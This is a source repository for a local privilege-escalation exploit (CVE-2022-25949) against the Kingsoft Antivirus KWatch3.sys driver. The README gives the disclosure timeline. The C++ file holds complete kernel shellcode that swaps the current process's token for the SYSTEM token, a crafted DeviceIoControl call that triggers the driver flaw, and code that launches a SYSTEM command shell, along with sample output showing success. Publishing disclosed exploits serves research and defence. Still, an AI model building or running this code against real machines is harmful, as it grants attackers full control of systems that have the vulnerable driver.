├── .gitignore ├── LICENSE ├── README.md └── src ├── exploit_kwatch3.sln └── exploit_kwatch3 ├── exploit_kwatch3.cpp ├── exploit_kwatch3.vcxproj └── exploit_kwatch3.vcxproj.filters /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Satoshi Tanda 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-25949 2 | 3 | A years-old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77. 4 | 5 | ## 2009..? 6 | 7 | I reported the issue in January 2014 and was notified of the CVE 8+ years later. I decided to upload this because it is amusing enough to find my old code and that it took that long. 8 | 9 | Thus, this must not be a new vulnerability despite the new CVE -- a quick search showed multiple reports for the same-looking vulnerability already. 10 | 11 | ## Timeline 12 | 13 | - Jan 12, 2014: I submit the issue to IPA 14 | - Jan 15, 2014: IPA acknowledges the submission 15 | - Mar 10, 2022: IPA notifies me for publication (I ignored it. I thought it was spam) 16 | - Mar 15, 2022: An [advisary](https://jvndb.jvn.jp/en/contents/2022/JVNDB-2022-000021.html) published 17 | 18 | I sill thank IPA for doing their parts and making my day. 19 | 20 | ## Notes 21 | 22 | The vulnerable file appears to be [ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479](https://www.virustotal.com/gui/file/ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479/details) 23 | 24 | ``` 25 | // 26 | // Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys) 27 | // Target File Version: 2009.3.17.77 28 | // Affected Product: Kingsoft Internet Security 9 Plus 29 | // 30 | 31 | /* 32 | ------------------------------------------------------------------------------ 33 | Shellcode is located at 7E7E7E7E. 34 | The device was opened as 00000020. 35 | Shellcode was executed. 36 | The SYSTEM shell was launched. 37 | This process will be suspended for ever. 38 | 39 | ------------------------------------------------------------------------------ 40 | Microsoft Windows [Version 6.1.7601] 41 | Copyright (c) 2009 Microsoft Corporation. All rights reserved. 42 | 43 | C:\Users\user\Desktop>whoami 44 | nt authority\system 45 | ------------------------------------------------------------------------------ 46 | */ 47 | ``` 48 | -------------------------------------------------------------------------------- /src/exploit_kwatch3.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 2013 for Windows Desktop 4 | VisualStudioVersion = 12.0.21005.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exploit_kwatch3", "exploit_kwatch3\exploit_kwatch3.vcxproj", "{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Release|Win32 = Release|Win32 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Debug|Win32.Build.0 = Debug|Win32 16 | {AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Release|Win32.ActiveCfg = Release|Win32 17 | {AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Release|Win32.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /src/exploit_kwatch3/exploit_kwatch3.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys) 3 | // Target File Version: 2009.3.17.77 4 | // Affected Product: Kingsoft Internet Security 9 Plus 5 | // 6 | 7 | /* 8 | ------------------------------------------------------------------------------ 9 | Shellcode is located at 7E7E7E7E. 10 | The device was opened as 00000020. 11 | Shellcode was executed. 12 | The SYSTEM shell was launched. 13 | This process will be suspended for ever. 14 | 15 | ------------------------------------------------------------------------------ 16 | Microsoft Windows [Version 6.1.7601] 17 | Copyright (c) 2009 Microsoft Corporation. All rights reserved. 18 | 19 | C:\Users\user\Desktop>whoami 20 | nt authority\system 21 | ------------------------------------------------------------------------------ 22 | */ 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #include 29 | #include 30 | #include 31 | 32 | 33 | namespace { 34 | 35 | 36 | // Indicates if privilege of this process has alredy been escaleted. 37 | volatile bool g_exploited = false; 38 | 39 | static const int BYTES_OF_SHELLCODE = 100; 40 | 41 | 42 | // 43 | // Prototypes 44 | // 45 | bool SendExploitData(); 46 | 47 | DWORD WINAPI WaitAndLauncCMDThread( 48 | __in void* Context); 49 | 50 | bool LaunchCMD(); 51 | 52 | void SuspendProcess(); 53 | 54 | 55 | // 56 | // Implementations 57 | // 58 | 59 | 60 | template inline 61 | std::unique_ptr make_unique_ptr( 62 | __in T* p, 63 | __in D d = D()) 64 | { 65 | return std::unique_ptr(p, std::forward(d)); 66 | } 67 | 68 | 69 | // Defines for XP SP3 70 | #define WINXP_KTHREAD_OFFSET 0x124 71 | #define WINXP_EPROCESS_OFFSET 0x44 72 | #define WINXP_FLINK_OFFSET 0x88 73 | #define WINXP_PID_OFFSET 0x84 74 | #define WINXP_TOKEN_OFFSET 0xc8 75 | #define WINXP_SYS_PID 4 76 | 77 | // Defines for 7 SP1 78 | #define WIN_7_KTHREAD_OFFSET 0x124 79 | #define WIN_7_EPROCESS_OFFSET 0x50 80 | #define WIN_7_FLINK_OFFSET 0xb8 81 | #define WIN_7_PID_OFFSET 0xb4 82 | #define WIN_7_TOKEN_OFFSET 0xf8 83 | #define WIN_7_SYS_PID 4 84 | 85 | // Target settings 86 | #define WIN_KTHREAD_OFFSET WIN_7_KTHREAD_OFFSET // nt!_KPCR.PcrbData.CurrentThread 87 | #define WIN_EPROCESS_OFFSET WIN_7_EPROCESS_OFFSET // nt!_KTHREAD.ApcState.Process 88 | #define WIN_FLINK_OFFSET WIN_7_FLINK_OFFSET // nt!_EPROCESS.ActiveProcessLinks.Flink 89 | #define WIN_PID_OFFSET WIN_7_PID_OFFSET // nt!_EPROCESS.UniqueProcessId 90 | #define WIN_TOKEN_OFFSET WIN_7_TOKEN_OFFSET // nt!_EPROCESS.Token 91 | #define WIN_SYS_PID WIN_7_SYS_PID // PID Process SYSTEM 92 | 93 | // Shellcode that exchanges a token of a current process with 94 | // a token of SYSTEM process in order to obtain SYSTEM privilege. 95 | __declspec (naked) static 96 | void ShellCode() 97 | {__asm{ 98 | //int 3 99 | pushad 100 | 101 | mov eax, fs:[WIN_KTHREAD_OFFSET] // eax <= Current._KTHREAD 102 | mov eax, [eax + WIN_EPROCESS_OFFSET] // eax <= Current._EPROCESS 103 | push eax 104 | 105 | mov ecx, WIN_SYS_PID 106 | 107 | SearchSystemProcess: 108 | mov eax, [eax + WIN_FLINK_OFFSET] // eax <= _EPROCESS.ActiveProcessLinks.Flink 109 | sub eax, WIN_FLINK_OFFSET // eax <= _EPROCESS of the next process 110 | cmp [eax + WIN_PID_OFFSET], ecx // if (UniqueProcessId != SYS_PID) 111 | jne SearchSystemProcess // jmp SearchSystemProcess 112 | mov edi, [eax + WIN_TOKEN_OFFSET] // edi <= Token of process with SYS_PID 113 | and edi, 0fffffff8h // Must be aligned by 8 114 | 115 | pop eax // eax <= Current._EPROCESS 116 | mov [eax + WIN_TOKEN_OFFSET], edi // Replace the token of the process to escalate 117 | // by the token of the process with SYS_PID 118 | 119 | popad 120 | //int 3 121 | mov g_exploited, 1 122 | 123 | EndlessLoop: 124 | pause 125 | jmp EndlessLoop 126 | int 3 127 | }} 128 | 129 | 130 | // Send exploit data to the driver 131 | bool SendExploitData() 132 | { 133 | const auto deviceHandle = make_unique_ptr(::CreateFile( 134 | TEXT("\\\\.\\kwatch3"), 135 | GENERIC_READ, 136 | FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 137 | nullptr, 138 | OPEN_EXISTING, 139 | FILE_ATTRIBUTE_NORMAL, 140 | nullptr), ::CloseHandle); 141 | if (deviceHandle.get() == INVALID_HANDLE_VALUE) 142 | { 143 | return false; 144 | } 145 | printf("The device was opened as %p.\n", deviceHandle.get()); 146 | 147 | std::vector exploit_kwatch3(0x44, 0x7e); 148 | DWORD returned = 0; 149 | const auto succeed = ::DeviceIoControl( 150 | deviceHandle.get(), 0x80030004, 151 | exploit_kwatch3.data(), exploit_kwatch3.size(), 152 | nullptr, 0, 153 | &returned, nullptr); 154 | 155 | return !!succeed; 156 | } 157 | 158 | 159 | DWORD WINAPI WaitAndLauncCMDThread( 160 | __in void* Context) 161 | { 162 | UNREFERENCED_PARAMETER(Context); 163 | 164 | while (!g_exploited) 165 | { 166 | ::Sleep(100); 167 | } 168 | printf("Shellcode was executed.\n"); 169 | 170 | if (!LaunchCMD()) 171 | { 172 | return 1; 173 | } 174 | printf("The SYSTEM shell was launched.\n"); 175 | printf("This process will be suspended for ever.\n"); 176 | SuspendProcess(); 177 | return 0; 178 | } 179 | 180 | 181 | bool LaunchCMD() 182 | { 183 | TCHAR cmd[] = TEXT("C:\\Windows\\system32\\cmd.exe"); 184 | PROCESS_INFORMATION pi; 185 | STARTUPINFO si = { sizeof(si) }; 186 | if (!::CreateProcess(cmd, cmd, nullptr, nullptr, FALSE, 187 | CREATE_NEW_CONSOLE, nullptr, nullptr, &si, &pi)) 188 | { 189 | return false; 190 | } 191 | 192 | ::CloseHandle(pi.hThread); 193 | ::CloseHandle(pi.hProcess); 194 | return true; 195 | } 196 | 197 | 198 | void SuspendProcess() 199 | { 200 | typedef LONG (NTAPI*NtSuspendProcessType)(HANDLE ProcessHandle); 201 | auto ntSuspendProcess = reinterpret_cast( 202 | ::GetProcAddress(::GetModuleHandle(TEXT("ntdll")), "NtSuspendProcess")); 203 | 204 | ntSuspendProcess(::GetCurrentProcess()); 205 | } 206 | 207 | 208 | } // end of {unnamed} 209 | 210 | 211 | int _tmain() 212 | { 213 | // Create a support thread 214 | auto thread = make_unique_ptr(::CreateThread( 215 | nullptr, 0, 216 | &WaitAndLauncCMDThread, nullptr, 217 | 0, nullptr), ::CloseHandle); 218 | if (!thread) 219 | { 220 | return 1; 221 | } 222 | 223 | // Initialize shellcode 224 | auto shellcodeSpace = make_unique_ptr(::VirtualAlloc( 225 | reinterpret_cast(0x7e7e7e7e), 0x1000, 226 | MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE), 227 | [](void* p){ ::VirtualFree(p, 0, MEM_RELEASE); }); 228 | if (!shellcodeSpace) 229 | { 230 | return 1; 231 | } 232 | memset(shellcodeSpace.get(), 0xCC, 0x1000); 233 | auto shellcode = reinterpret_cast(0x7e7e7e7e); 234 | memcpy(shellcode, &ShellCode, BYTES_OF_SHELLCODE); 235 | printf("Shellcode is located at %p.\n", shellcode); 236 | 237 | // exploit 238 | if (!SendExploitData()) 239 | { 240 | return 1; 241 | } 242 | return 0; 243 | } 244 | -------------------------------------------------------------------------------- /src/exploit_kwatch3/exploit_kwatch3.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC} 15 | Win32Proj 16 | exploit_kwatch3 17 | 18 | 19 | 20 | Application 21 | true 22 | v120_xp 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v120_xp 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | 51 | 52 | Level4 53 | Disabled 54 | WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) 55 | true 56 | 57 | 58 | Console 59 | true 60 | 61 | 62 | 63 | 64 | Level4 65 | 66 | 67 | MaxSpeed 68 | true 69 | true 70 | WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) 71 | true 72 | MultiThreaded 73 | 74 | 75 | Console 76 | true 77 | true 78 | true 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | -------------------------------------------------------------------------------- /src/exploit_kwatch3/exploit_kwatch3.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | --------------------------------------------------------------------------------